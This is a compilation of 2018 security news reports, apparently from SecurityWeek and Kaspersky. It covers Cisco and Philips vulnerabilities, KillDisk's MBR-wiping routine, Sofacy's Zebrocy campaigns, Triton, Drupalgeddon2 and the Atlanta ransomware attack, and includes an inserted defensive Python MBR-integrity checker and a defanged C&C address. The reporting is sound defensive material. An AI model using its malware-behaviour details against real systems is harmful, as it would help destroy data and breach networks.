Cisco confirmed that there are no workarounds that address this vulnerability.

Cisco also reported five high severity vulnerabilities in the Prime Collaboration Provisioning solution, two of which could be exploited by an unauthenticated attacker to reset the password on vulnerable products and gain admin-level privileges by sending a specially crafted password reset request.

Another high severity vulnerability could be exploited by an unauthenticated attacker to execute arbitrary SQL queries. Cisco also fixed high severity access control vulnerabilities that could lead to privilege escalation.

Customers need to update Prime Collaboration Provisioning to version 12.3, which addresses all of these flaws.

The flaws have been identified by experts from Cisco during internal security testing.


Cisco also fixed an information disclosure bug in Meeting Server, and a DoS vulnerability that affects several products of the IT giant.


New KillDisk Variant Hits Latin America
8.6.2018 securityweek 
Virus

A new version of the destructive KillDisk malware was observed earlier this year targeting organizations in Latin America, Trend Micro reports.

KillDisk has been around for several years, and was used in attacks targeting Ukraine’s energy sector in 2015, orchestrated by the Russia-linked threat actor BlackEnergy.

Initially designed to wipe hard drives and render systems inoperable, the malware received file-encrypting capabilities in late 2016, with a Linux-targeting variant of the ransomware spotted shortly after.

In January, Trend Micro security researchers observed a new variant of the malware in Latin America, and revealed that the threat was once again deleting files and wiping the disk.

One of the attacks, the security firm reveals, was related to a foiled heist on the organization’s system connected to the SWIFT network (Society for Worldwide Interbank Financial Telecommunication).

In May, the security firm observed a master boot record (MBR)-wiping malware in the region, with one of the impacted organizations being a bank “whose systems were rendered inoperable for several days.” The attack, however, was deemed a distraction, as the actor behind it was in fact focused on accessing systems connected to the bank’s local SWIFT network.

The researchers also discovered that the malware used in this attack was a new variant of KillDisk, based on the error message displayed by the affected systems (common to machines infected with MBR-wiping threats).

“The nature of this payload alone makes it difficult to determine if the attack was motivated by an opportunistic cybercriminal campaign or part of a coordinated attack like the previous attacks we observed last January,” Trend Micro says.

The malware used in the May attack was created using Nullsoft Scriptable Install System (NSIS), with the actor purposely naming it “MBR Killer.” Analysis of the sample revealed a routine to wipe the first sector of the machine’s physical disk.

The security researchers also say they haven’t found other new or notable routines in the sample and that no command-and-control (C&C) infrastructure or communication were observed. Furthermore, no ransomware-like routines were found in the malware, nor network-related behavior.

The threat can wipe all of the physical hard disks on the infected system. To wipe the MBR, it retrieves the handle of the hard disk, overwrites the first sector of the disk (512 bytes) with “0x00”, attempts the same routine on all hard disks, then forces the machine to shut down.
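A defender-side integrity check for the sector this routine destroys, added here as an example that is not Trend Micro's code: it decodes the MBR's partition table, classifies a sector as valid, wiped (all 0x00, as the MBR Killer routine leaves it) or otherwise damaged, and compares it with a digest taken while the host was known good. The sample MBR is constructed; the device path in `read_first_sector` is an assumption.

```python
"""Added example: MBR integrity check against the all-zero overwrite described
above. The sample sector is constructed, not read from a real disk."""
import hashlib
import struct
from typing import Dict, List

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xAA"      # last two bytes of a valid MBR
PART_TABLE_OFFSET = 446           # four 16-byte partition entries follow the boot code


def parse_partitions(sector: bytes) -> List[Dict[str, int]]:
    """Decode the four primary partition entries of an MBR (empty type 0x00 skipped)."""
    entries = []
    for i in range(4):
        off = PART_TABLE_OFFSET + 16 * i
        # boot flag, 3-byte CHS start, type, 3-byte CHS end, LBA start, sector count
        boot, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, off)
        if ptype != 0:
            entries.append({"index": i, "bootable": boot == 0x80, "type": ptype,
                            "lba_start": lba_start, "sectors": sectors})
    return entries


def classify_sector(sector: bytes) -> str:
    """'wiped'  : every byte is 0x00 (what the MBR Killer routine leaves behind)
       'valid'  : 512 bytes ending in 55 AA with at least one partition entry
       'damaged': anything else (truncated, bad signature, empty table)"""
    if len(sector) != SECTOR_SIZE:
        return "damaged"
    if not any(sector):
        return "wiped"
    if sector[-2:] != BOOT_SIGNATURE or not parse_partitions(sector):
        return "damaged"
    return "valid"


def sector_digest(sector: bytes) -> str:
    """SHA-256 of the raw sector; record this while the host is known good."""
    return hashlib.sha256(sector).hexdigest()


def check_against_baseline(sector: bytes, baseline_digest: str) -> Dict[str, object]:
    """Combine the structural check with a comparison against the recorded digest."""
    return {"state": classify_sector(sector),
            "matches_baseline": sector_digest(sector) == baseline_digest}


def build_sample_mbr() -> bytes:
    """Constructed MBR: dummy boot code and one bootable NTFS-type (0x07) partition."""
    boot_code = bytes([0x33, 0xC0, 0x8E, 0xD0]) + b"\x90" * (PART_TABLE_OFFSET - 4)
    entry = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 1_000_000)
    table = entry + b"\x00" * 48          # remaining three entries empty
    return boot_code + table + BOOT_SIGNATURE


def read_first_sector(device_path: str) -> bytes:
    """Read the live MBR; needs privileges (assumed path such as /dev/sda on Linux)."""
    with open(device_path, "rb") as dev:
        return dev.read(SECTOR_SIZE)


if __name__ == "__main__":
    good = build_sample_mbr()
    baseline = sector_digest(good)
    print(parse_partitions(good))
    print(check_against_baseline(good, baseline))
    print(check_against_baseline(b"\x00" * SECTOR_SIZE, baseline))  # state: wiped
```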

“The destructive capabilities of this malware, which can render the affected machine inoperable, underscore the significance of defense in depth: arraying security to cover each layer of the organization’s IT infrastructure, from gateways and endpoints to networks and servers,” Trend Micro notes.


U.S. in Deal to Ease Sanctions on China's ZTE: Top Official
8.6.2018 securityweek IT

US officials reached a deal Thursday to ease sanctions which threatened to cripple Chinese smartphone maker ZTE, Commerce Secretary Wilbur Ross said.

Ross told CNBC television the deal includes a $1 billion fine levied on the Chinese firm and a requirement that it change its board of directors.

In April, the Chinese group was cut off from US technology products for violating US sanctions against North Korea and Iran -- measures which threatened to put ZTE out of business.

Ross said the agreement calls for "embedding a compliance department" chosen by Washington to monitor company conduct.

"They will pay for those people but the people will report to the new chairman," Ross said.

"This is a pretty strict settlement. The strictest and largest settlement fine that has ever been brought by the Commerce Department against any violator of export controls."

Ross said the plan calls for ZTE to create a $400 million escrow account in case of future violations, and a requirement to overhaul the board of directors and executive team within 30 days.

Several US lawmakers have warned against easing sanctions on ZTE, citing national security concerns.

But President Donald Trump last month said he was looking at options to prevent a shutdown of ZTE.

The news comes amid increasing trade tensions between Washington and Beijing, with Trump threatening to impose tariffs on Chinese technology products to reduce a large trade deficit.


Russian Cyberspies Change Tactics in Recent Campaign
8.6.2018 securityweek BigBrothers  CyberSpy

Recently observed attacks orchestrated by the Russian threat group Sofacy have revealed a change in tactics and new iterations of previously known tools, according to Palo Alto Networks researchers.

Also tracked as APT28, Fancy Bear, Pawn Storm, Sednit and Strontium, the cyber-espionage group has been associated with numerous attacks worldwide, including those targeting the 2016 presidential election in the United States, assaults on Ukraine and NATO countries, and attacks on targets in Asia.

Earlier this year, security researchers revealed that Sofacy’s campaigns overlap with other state-sponsored operations, and also dissected a new backdoor employed by the group. Dubbed Zebrocy, the new malware consists of a Delphi downloader and an AutoIT stage, ESET reported in April.

Now, Palo Alto reveals that a C++ version of Zebrocy has also been seen in attacks. Furthermore, the security researchers discovered Sofacy attacks that leveraged the Dynamic Data Exchange (DDE) exploit technique to deliver different payloads than before.

The campaign, Palo Alto says, breaks out of the previously observed patterns in that it no longer targets only a handful of employees within a single organization. Instead, the attackers sent phishing emails to “an exponentially larger number of individuals” within the target company.

“The targeted individuals did not follow any significant pattern, and the email addresses were found easily using web search engines. This is a stark contrast with other attacks commonly associated with the Sofacy group,” the security researchers explain.

Not only did the group launch a large number of Zebrocy attacks, but it also started using DDE to deliver payloads such as the Zebrocy backdoor and the open-source penetration testing toolkit Koadic (this is the first time it leverages this tool). Previously, the group used the DDE technique for the distribution of Seduploader.

As detailed in a February report, Palo Alto also discovered that the group was hiding infrastructure using random registrant and service provider information for each attack and that they deployed a webpage on each of the domains.

The artifact led to the discovery of an attack campaign using the DealersChoice exploit kit, as well as another domain serving the Zebrocy AutoIT downloader.

Eventually, this led to the discovery of the C++ variant of the Zebrocy downloader tool, as well as to “evidence of a completely different payload in Koadic being delivered as well.” The Delphi backdoor delivered as the final payload in Zebrocy attacks was found hosted at IP address 185.25.50[.]93, the researchers say.

From this command and control (C&C) IP, the researchers discovered another hard-coded user agent being used by Zebrocy. Several samples of the backdoor employing the user agent were observed targeting the foreign affairs ministry of a large Central Asian nation.

One other sample used a different user agent, which the researchers determined was from a secondary payload retrieved by the malware. The researchers eventually discovered over forty additional Zebrocy samples, several of which were targeting the same Central Asian nation.

Two weaponized Office documents leveraging DDE were also observed: one targeted a North American government organization dealing with foreign affairs with the Zebrocy AutoIT downloader, and the other targeted the previously mentioned large Central Asian nation, this time with a non-Zebrocy payload, namely Koadic.

“Sofacy is carrying out parallel campaigns to attack similar targets around the world but with different toolsets. The Zebrocy tool associated with this current strain of attacks is constructed in several different forms based on the programming language the developer chose to create the tool. We have observed Delphi, AutoIt, and C++ variants of Zebrocy, all of which are related not only in their functionality, but also at times by chaining the variants together in a single attack,” Palo Alto concludes.


Triton ICS Malware Developed Using Legitimate Code
8.6.2018 securityweek ICS

The developers of Triton, a recently discovered piece of malware designed to target industrial control systems (ICS), reverse engineered a legitimate file in an effort to understand how the targeted devices work.

Triton, also known as Trisis and HatMan, was discovered in August 2017 after a threat group linked by some to Iran used it against a critical infrastructure organization in the Middle East. The malware targets Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers, which use the proprietary TriStation network protocol. The malware leveraged a zero-day vulnerability affecting older versions of the product.

Triconex controller targeted by Triton ICS malware

FireEye’s Advanced Practices Team has conducted a detailed analysis of the threat, which it describes as a malware framework, in an effort to determine when and how it was created.

The TriStation protocol is designed for communications between PCs (e.g. engineering workstations) and Triconex controllers. With no public documentation available, the protocol is not easy to understand, but it has been implemented by Schneider through the TriStation 1131 software suite.

It’s unclear how the attackers obtained the hardware and software they used to test the malware. They may have purchased it or borrowed it from a government-owned utility. The software could have also been stolen from ICS companies or other organizations that use Triconex controllers.

FireEye believes, however, that the malware developers did not build the TriStation communications component from the ground up. The company’s analysis suggests that the hackers copied code from legitimate libraries.

Specifically, researchers discovered significant similarities between the code found in the malware and code in a legitimate TriStation software file named “tr1com40.dll.”

While reverse engineering the legitimate DLL file may have helped them understand how TriStation works, the code in the malware suggests it did not answer all their questions. This may have led to the problems experienced by the threat group during its attack on the critical infrastructure organization.

Triton was discovered after it accidentally caused SIS controllers to initiate a safe shutdown. Experts believe the attackers had been conducting tests, trying to determine how they could cause physical damage.

“Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward it would be reasonable to anticipate additional frameworks, such as TRITON, designed for usage against other SIS controllers and associated technologies,” FireEye said in its report. “If Triconex was within scope, we may see similar attacker methodologies affecting the dominant industrial safety technologies.”

Industrial cybersecurity firm Dragos reported recently that the threat group behind the Triton attack, which it tracks as Xenotime, is still active, targeting organizations worldwide and safety systems other than Schneider’s Triconex.


Serious Flaws Found in Philips Patient Monitoring Devices
8.6.2018 securityweek ICS

Researchers have discovered serious vulnerabilities in patient monitoring devices from Philips. The vendor has shared some recommendations for mitigating the risks until patches are made available.

A total of three flaws were identified by Medigate in Philips IntelliVue patient monitors (MP and MX series) and Avalon fetal monitoring systems (FM20, FM30, FM40 and FM50). Advisories describing the issues have been published by Medigate, Philips and ICS-CERT.

The most serious of them, based on its CVSS score of 8.3, allows an unauthenticated attacker to access memory and write to the memory of a targeted device. A similar flaw allows an unauthenticated attacker to read memory, but this issue has been assigned a severity rating of “medium.”

Another high severity vulnerability is related to the devices exposing an “echo” service that can be leveraged by an attacker to cause a stack-based buffer overflow.

Vulnerabilities found in Philips fetal monitoring system

“The vulnerabilities allow a remote unauthenticated attacker to write memory on the device, which may allow remote code execution. Successful exploitation could open up a window for an attacker to read and/or write to the memory, which in turn could lead to a denial of service to the monitor, a breach of patient health information (PHI), as well as harm the integrity of the patient data,” Medigate said.

Philips expects to release patches in the second and third quarters of 2018. In the meantime, users have been advised to consult security and network configuration guides provided by the company to mitigate the risk.

“At this time, Philips has received no reports of exploitation of these vulnerabilities or incidents from clinical use that we have been able to associate with this problem, and no public exploits are known to exist that specifically target these vulnerabilities,” Philips said in its advisory.

The company also pointed out that exploiting these flaws requires “significant technical knowledge and skill,” and access to the local area network (LAN) hosting the affected devices.

Earlier this year, Philips informed customers that dozens of vulnerabilities affected the company’s IntelliSpace Portal, a visualization and analysis solution designed for healthcare organizations.


Cryptocurrency Theft Tops $1 Billion in Past Six Months
8.6.2018 securityweek Cryptocurrency

$1.1 billion has been stolen in cryptocurrency thefts over the last six months. This is the visible effect of an illicit dark web market economy which is reportedly worth $6.7 million. That market fuels cryptocurrency thefts from exchanges, businesses, and individuals; and the growing incidence of cryptojacking.

The basic problem is that cryptocurrencies are increasingly popular, which drives up their value. This makes investment popular for both individuals and businesses; and this in turn attracts the criminals. The three most common attacks involve currency-stealing malware (designed to quietly steal the users' wallet content and send it to the attacker); illicit mining (designed to use business infrastructures to mine cryptocurrency for the attacker); and cryptojacking (which is illicit mining targeted at individuals).

A six-month study (PDF) by Carbon Black into how cryptocurrency malware is bought and sold in the dark web has shown an estimated 12,000 dark web marketplaces selling approximately 34,000 offerings related to cryptocurrency theft. Malware offerings range from as little as $1.04 to as much as $1,000, with an average price of $224.

Bitcoin remains the primary cryptocurrency used for legitimate cyber transactions -- but cybercriminals are moving to alternative and more profitable currencies, such as Monero -- which is now used in 44% of all attacks. Cybercriminals are increasingly moving away from Bitcoin (for example, as ransomware payment) because the associated fees are high, and the transactions take too long to process. "These cybercriminals appear to prefer Monero due to privacy, non-traceability and comparatively low transaction fees," says the report.

This applies to both illicit mining and wallet theft. Ethereum is the second most popular criminal currency at 11%, with Bitcoin third at 10%. There is no direct correlation between the popularity of the currency among criminals, and the market capitalization of the currency. At the time the report was compiled, the top three currencies by capitalization were Bitcoin (around $180 billion), Ethereum (around $90 billion), and Ripple (around $40 billion).

Cryptocurrency exchanges are the most vulnerable targets. Carbon Black's research shows that during the period of analysis, 27% of all incidents involved exchanges. Exchanges combine the attraction of potentially large amounts of coin to steal, with user information for follow-on targeting by the same criminals (representing 14% of all crypto-currency related thefts).

In February 2018, Italy's BitGrail lost 17 million units of Nano (XRB) to hackers, valued at around $170 million. Coincheck in Japan had $530 million stolen in NEM (one of the lesser known currencies) in January 2018. In December 2017 South Korean Youbit filed for bankruptcy following two separate hacks -- one in April and one in December.

Just over one-in-five of all attacks are against businesses -- but most of these focus on the deployment of illicit crypto-mining malware where the victim infrastructure is used to quietly mine cryptocurrency. The same approach is also used against government websites, with Carbon Black finding that "nearly 7% of cryptocurrency attacks targeted various governments using the same tactics, techniques and procedures (TTPs) found in private industry attacks." In both cases, all proceeds are directed to the attackers' own wallets.

Closely related to this attack is 'cryptojacking' aimed at individual users. "Our research found that a growing number of websites are either intentionally deploying cryptocurrency scripts or are being used to deliver illicit mining malware to unsuspecting users. This is most commonly referred to as 'cryptojacking', and, even if you aren't being targeted for your own cryptocurrency, there's a chance your endpoint may be abused for someone else's gain."

Carbon Black expects cryptocurrency theft and illicit mining to continue to grow. "These cryptocurrencies represent an alternative and lucrative funding stream, which is especially true for criminals, as well as nation-states desperately seeking to subvert sanctions."

To deter such attacks, Carbon Black urges the use of endpoint protection software. For individuals, it also advises that users should avoid installing untrusted applications or following unfamiliar links; and that an ad-blocker should be used to "reduce the risk of having your device used to harvest cryptocurrency without your consent."

Businesses, urges Carbon Black, should store cryptocurrency in an off-line wallet. "Never," it stresses, "store your cryptocurrency in an online or warm wallet (a dedicated device that must be connected to the internet to make transactions). Cold storage is best."

To demonstrate the size of the problem, the company compares the cryptocurrency losses it found in six months ($1.1 billion) to the total cost of all cybercrime in the whole of 2016 ($1.3 billion -- according to the FBI).

Carbon Black filed for an IPO in April 2018 with plans to sell 8 million shares at $15 to $17. It raised this price to $19 and started trading on the NASDAQ on May 4, raising $152 million. At the time of writing, shares have risen to $26.10.


Google Won't Use Artificial Intelligence for Weapons
8.6.2018 securityweek Security

Google announced Thursday it would not use artificial intelligence for weapons or to "cause or directly facilitate injury to people," as it unveiled a set of principles for these technologies.

Chief executive Sundar Pichai, in a blog post outlining the company's artificial intelligence policies, noted that even though Google won't use AI for weapons, "we will continue our work with governments and the military in many other areas" including cybersecurity, training, and search and rescue.

The news comes with Google facing pressure from employees and others over a contract with the US military, which the California tech giant said last week would not be renewed.

Pichai set out seven principles for Google's application of artificial intelligence, or advanced computing that can simulate intelligent human behavior.

He said Google is using AI "to help people tackle urgent problems" such as prediction of wildfires, helping farmers, diagnosing disease or preventing blindness.

"We recognize that such powerful technology raises equally powerful questions about its use," Pichai said in the blog.

"How AI is developed and used will have a significant impact on society for many years to come. As a leader in AI, we feel a deep responsibility to get this right."

The chief executive said Google's AI programs would be designed for applications that are "socially beneficial" and "avoid creating or reinforcing unfair bias."

He said the principles also called for AI applications to be "built and tested for safety," to be "accountable to people" and to "incorporate privacy design principles."

Google will avoid the use of any technologies "that cause or are likely to cause overall harm," Pichai wrote.

That means steering clear of "weapons or other technologies whose principal purpose or implementation is to cause or directly facilitate injury to people" and systems "that gather or use information for surveillance violating internationally accepted norms."

The move comes amid growing concerns that automated or robotic systems could be misused and spin out of control, leading to chaos.

Several technology firms have already agreed to the general principles of using artificial intelligence for good, but Google appeared to offer a more precise set of standards.

The company, which is already a member of the Partnership on Artificial Intelligence including dozens of tech firms committed to AI principles, had faced criticism for the contract with the Pentagon on Project Maven, which uses machine learning and engineering talent to distinguish people and objects in drone videos.

Faced with a petition signed by thousands of employees and criticism outside the company, Google indicated the $10 million contract would not be renewed, according to media reports.


Facebook Admits Privacy Settings 'Bug' Affecting 14 Million Users
8.6.2018 securityweek
Social

Facebook acknowledged Thursday a software glitch that changed the settings of some 14 million users, potentially making some posts public even if they were intended to be private.

The news marked the latest in a series of privacy embarrassments for the world's biggest social network, which has faced a firestorm over the hijacking of personal data on tens of millions of users and more recently for disclosures on data-sharing deals with smartphone makers.

Erin Egan, Facebook's chief privacy officer, said in a statement that the company recently "found a bug that automatically suggested posting publicly when some people were creating their Facebook posts."

Facebook said this affected users posting between May 18 and May 27 as it was implementing a new way to share some items such as photos.

That left the default or suggested method of sharing as public instead of only for specific users or friends.

Facebook said it corrected the problem on May 22 but was unable to change all the posts, so is now notifying affected users.

"Starting today we are letting everyone affected know and asking them to review any posts they made during that time," Egan said.

"To be clear, this bug did not impact anything people had posted before -- and they could still choose their audience just as they always have. We'd like to apologize for this mistake."

Facebook confirmed earlier this week that China-based Huawei -- which has been banned by the US military and is a lightning rod for cyberespionage concerns -- was among device makers authorized to see user data in agreements that had been in place for years.

Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

The revelations come weeks after chief executive Mark Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 presidential campaign.


Drupal Refutes Reports of 115,000 Sites Still Affected by Drupalgeddon2
8.6.2018 securityweek
Vulnerability

The Drupal Security Team has refuted reports that at least 115,000 websites are still vulnerable to Drupalgeddon2 attacks, arguing that the methodology used by the researcher who announced that number is flawed.

Researcher Troy Mursch recently conducted an analysis of websites running Drupal 7, the most widely used version of the content management system (CMS), and apparently found that many of them had still not patched the Drupalgeddon2 vulnerability.

Mursch identified nearly 500,000 Drupal 7 websites through the PublicWWW source code search engine and found that 115,070 had been running older versions of the CMS. The analysis showed that roughly 134,000 sites had not been vulnerable, while for 225,000 the version of Drupal they had been using could not be determined.

These numbers are apparently based on data from the publicly accessible “CHANGELOG.txt” file found on each website – sites using Drupal 7.58 or a later version were classified as not vulnerable while earlier versions were counted as affected.

“Checking the contents of CHANGELOG.txt is not a valid way to determine whether a site is vulnerable to any given attack vector,” the Drupal Security Team said in a statement posted on its website and sent out to journalists. “Patches distributed by the Drupal security team to fix the issues were widely used, but did not touch CHANGELOG.txt or any version strings defined elsewhere. There are also other mitigations that vendors have provided which would also not affect CHANGELOG.txt but would protect the site.”

“We believe the presented numbers to be inaccurate. We consider it to be misleading to draw conclusions from this sparse information,” it added.

In an update to his initial blog post, Mursch says it’s impossible to determine exactly how many Drupal websites are still vulnerable to Drupalgeddon2 attacks without actually attempting to exploit the vulnerability.

“While we know 115,000 sites are using outdated Drupal versions, based on the publicly accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did unless we perform the actual exploit,” Mursch said.

“Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version of Drupal,” he added.

Drupalgeddon2, tracked as CVE-2018-7600, allows a remote attacker to execute arbitrary code and take complete control of a website running Drupal 6, 7 or 8. The flaw has been patched with the release of versions 7.58, 8.5.1, 8.3.9 and 8.4.6, with fixes also available for the outdated Drupal 6.

Drupalgeddon2 has been exploited by malicious actors to deliver cryptocurrency miners, backdoors, RATs and tech support scams.

During the analysis of Drupalgeddon2, the Drupal Security Team and the developer who reported the original vulnerability identified another flaw. This second vulnerability, tracked as CVE-2018-7602 and dubbed by some Drupalgeddon3, has also been exploited in the wild.


Atlanta Says Further $9.5 Million Needed for Ransomware Recovery
8.6.2018 securityweek
Ransomware

Atlanta Ransomware Attack Was Far More Serious Than Originally Thought and Even Wiped Out the Police Dash-cam Recordings Archive

The City of Atlanta was struck by SamSam ransomware in March 2018. The ransom was set at $51,000 (in Bitcoin); but is believed not to have been paid. At that time, it was thought that some customer-facing applications and some internal services had been disrupted; but that no critical services had been affected.

One month later, it was reported that the cost of recovery from the attack had already reached nearly $3 million, and the city had not yet fully recovered.

Exactly what happened at Atlanta will not be known -- if it ever is -- until the work of the forensic investigators is complete. It is known, however, that the SamSam actors typically target their victims, gain access to the infrastructure, and interfere with processes before encrypting files. Hancock Health was hit by SamSam in January 2018. It paid the ransom, but a few days later, CEO Steve Long reported, "Though the electronic medical record backup files had not been touched, the core components of the backup files from all other systems had been purposefully and permanently corrupted by the hackers."

On Wednesday this week, Atlanta information management head Daphne Rackley told the City Council that the Atlanta ransomware attack was far more serious than originally thought. More than one-third of the 424 software programs used by the city remain off-line or at least partially disabled -- and almost 30% of those are considered 'critical'.

City attorney Nina Hickson, for example, said her office had lost more than 70 of its 77 computers and ten years of legal documents. Police Chief Erika Shields told local television news station WSB-TV 2 that the hack irretrievably wiped out the police dash-cam recordings archive.

The Atlanta City Council is preparing to vote on the fiscal budget 2019, and must do so by the end of the month. It has now been told by Rackley that her department is likely to require an additional $9.5 million over the coming year because of the ransomware.

The Atlanta incident is a wake-up call that highlights the ransom quandary. Paying the ransom feeds the criminal activity, puts a target on the victim's back for other criminals, and does not guarantee receipt of decryption keys. Not paying, however, will inevitably lead to recovery costs that could, for the unprepared, be extreme.

Atlanta seems to have been particularly unprepared. "I think that the true problem is not ransomware," comments Ilia Kolochenko, CEO of High-Tech Bridge. "The problem is unreliable, overcomplicated and insecure-by-design IT architecture. Segregation of duties, data and network access control, proper segmentation, daily backup, desktop hardening, anomaly detection -- are, de facto, a must-have in any modern company or governmental entity. Apparently, none were in place."

Robust disaster recovery and backup systems can be particularly effective against extortion attacks. "Being able to easily and quickly recover data, like the dash-cam footage, from mere seconds before it was lost or disrupted can save an organization time, money and many other types of damage," says Gijsbert Janssen Van Doorn, technology evangelist at Zerto.

The Barnstable Police Department is a case in point. The small town Police Department on Massachusetts' Cape Cod was hit by ransomware in 2016 -- but an effective disaster recovery system meant the ransomware was mitigated and eradicated with a maximum downtime of less than 40 minutes, and no more than 2 minutes of lost data.

"Atlanta is now just another case study on what best practices need to be in place to protect an organization's CyberPosture," comments Mukul Kumar, CISO and VP of cyber practice at Cavirin. "They're already talking about direct costs in the tens of millions, but the indirect costs and other impacts are potentially much greater." The cost of prevention is inevitably less than the cost of cure.

Atlanta also demonstrates a dangerous escalation. A city is not merely an organization, it is part of the critical infrastructure. "The reality is that these are more lucrative targets than credit cards and people's identities when you look at it from an attacker perspective," warns Rishi Bhargava, co-founder at Demisto. "Attacks on cities, and our infrastructure, are like terrorist attacks and cities and governments will be willing to pay." He believes they must not.

The terrorist analogy is not lost on Kolochenko. This attack, he suggests, was "likely driven by a trivial itch for gain, but what would the outcome be if the attackers were a nation-state group? They can cause tremendous damage to the city, its infrastructure and citizens. I think the IT companies responsible for maintenance of the Atlanta critical IT infrastructure can be liable for negligence. Someone should be accountable for this."


Cisco Patches Severe Vulnerabilities in Prime Collaboration Provisioning
8.6.2018 securityweek
Vulnerability

Cisco informed customers this week that it has patched one critical and five high severity vulnerabilities in Prime Collaboration Provisioning (PCP), a web-based provisioning solution that allows organizations to manage their communications services.

The critical flaw, CVE-2018-0321, allows a remote and unauthenticated attacker to access the Java Remote Method Invocation (RMI) system and perform actions that affect both the PCP and the devices connected to it.

The list of high severity vulnerabilities affecting PCP includes two issues that allow an unauthenticated attacker to reset the password on affected systems and gain admin-level privileges by sending a specially crafted password reset request.

Another high severity bug allows an unauthenticated attacker to execute arbitrary SQL queries. The remaining high severity vulnerabilities are access control issues that allow authenticated attackers to elevate their privileges.

Users can patch all the PCP vulnerabilities by updating to version 12.3, but fixes for some of these flaws are included in versions 12.1 and 12.2. The security holes have been identified by Cisco during internal security testing and there is no evidence of exploitation in the wild.

Cisco also fixed a critical vulnerability, tracked as CVE-2018-0315, in the authentication, authorization, and accounting (AAA) security services of Cisco IOS XE software. An attacker can exploit this flaw remotely to execute arbitrary code on a device or cause a denial-of-service (DoS) condition.

Other high severity problems patched this week include DoS vulnerabilities in IP Phone and Adaptive Security Appliance (ASA) products, a security bypass in Cisco Web Security Appliance (WSA), and a command execution vulnerability in Network Services Orchestrator (NSO).

Cisco’s advisories also describe an information disclosure bug in Meeting Server, and a DoS vulnerability impacting multiple products.

Patches are available for all these flaws and there is no evidence of malicious exploitation.


FIFA public Wi-Fi guide: which host cities have the most secure networks?
8.6.2018 Kaspersky Security
We all know how easy it is for users to connect to open Wi-Fi networks in public places. Well, it is equally straightforward for criminals to position themselves near poorly protected access points – where they can intercept network traffic and compromise user data.

A lack of essential traffic encryption for Wi-Fi networks where official and global activities are taking place – such as at locations around the forthcoming FIFA World Cup 2018 – offers especially fertile ground for criminals.

With this in mind, can football fans feel digitally safe in host cities? How does the situation with Wi-Fi access differ from town to town? To answer these questions, we have analyzed existing reliable and unreliable access points in 11 FIFA World Cup host cities – Saransk, Samara, Nizhny Novgorod, Kazan, Volgograd, Moscow, Ekaterinburg, Sochi, Rostov, Kaliningrad, and Saint Petersburg.

The research is based on telemetry from a feature that aims to secure users’ Wi-Fi connections and turn on a VPN when needed. Statistics were generated from users who voluntarily agreed to have their data collected. For the research, we evaluated only the security of public Wi-Fi spots. Even with relatively few public Wi-Fi spots in small towns, we still obtained a sufficient base for analysis: almost 32,000 Wi-Fi hotspots. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points.

Security of Wireless Networks in FIFA World Cup host cities
Using the methodology described above, we have evaluated the security of Wi-Fi access points in 11 FIFA World Cup 2018 host cities.

Encryption types used in public Wi-Fi hotspots in FIFA World Cup host cities

Over a fifth (22.4%) of Wi-Fi hotspots in FIFA World Cup 2018 host cities are unreliable networks. This means that criminals simply need to be located near an access point to grab the traffic and get their hands on user data.

Around three quarters of all access points use encryption based on the Wi-Fi Protected Access (WPA/WPA2) protocol family, which is considered one of the most secure. The level of protection depends largely on the settings, such as the strength of the password set by the hotspot owner; a sufficiently complex encryption key can take years to crack.

It should also be noted that even reliable networks, like WPA2, cannot automatically be considered totally secure. They remain susceptible to brute-force, dictionary and key reinstallation attacks, for which a large number of tutorials and open source tools are available online. Traffic on a WPA-protected public access point can also be intercepted by an attacker who inserts themselves between the access point and the device at the start of the session.

Encryption types used in public Wi-Fi hotspots in FIFA World Cup host cities

The safest city (in terms of public Wi-Fi) turned out to be Saransk, with 72% of access points secured by WPA/WPA2 protocol encryption.

The top-three cities with the highest proportion of unsecured connections are Saint Petersburg (48% of Wi-Fi access points are unsecured), Kaliningrad (47%) and Rostov (44%).

Again, the relativity of the results should be noted. Even a WPA2 connection in a cafe cannot be considered secure if the password is visible to everyone. Nevertheless, we believe the methodology used represents the Wi-Fi hotspot security situation in the host cities with a fair degree of accuracy.

The results of this research show that the security of Wi-Fi connections in FIFA World Cup host cities varies. We therefore recommend that users follow some key safety rules.

Recommendations for Users
If you are going to visit any of the FIFA World Cup 2018 host cities and use open Wi-Fi networks while you are there, remember to follow these simple rules to help protect your personal data:

Whenever possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning that criminals won’t be able to read your data, even if they gain access to it. For example, the Kaspersky Secure Connection VPN solution can switch on automatically when a connection is not safe.
Do not trust networks that are not password-protected, or have easy-to-guess or easy-to-find passwords.
Even if a network requests a strong password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection using the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by the employees of an establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend you also disable automatic connections to existing Wi-Fi networks.
If you are not 100% sure that the wireless network you are using is secure, but you still need to connect to the Internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely do not perform any online banking operations or enter your bank card details anywhere. This will avoid situations where your sensitive data or passwords are intercepted and then used for malicious purposes later on.
To avoid becoming a cybercriminal target, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. Enabling this option is recommended when visiting any websites you think may lack the necessary protection.
One example of a dedicated solution is the Secure Connection tool included in the latest versions of Kaspersky Internet Security and Kaspersky Total Security. This module protects users who are connected to Wi-Fi networks by providing them with a secure encrypted connection channel. Secure Connection can be launched manually or, depending on the settings, activated automatically when connecting to public Wi-Fi networks, when navigating to online banking and payment systems or online stores, and when communicating online (via mail services, social networks, etc.).


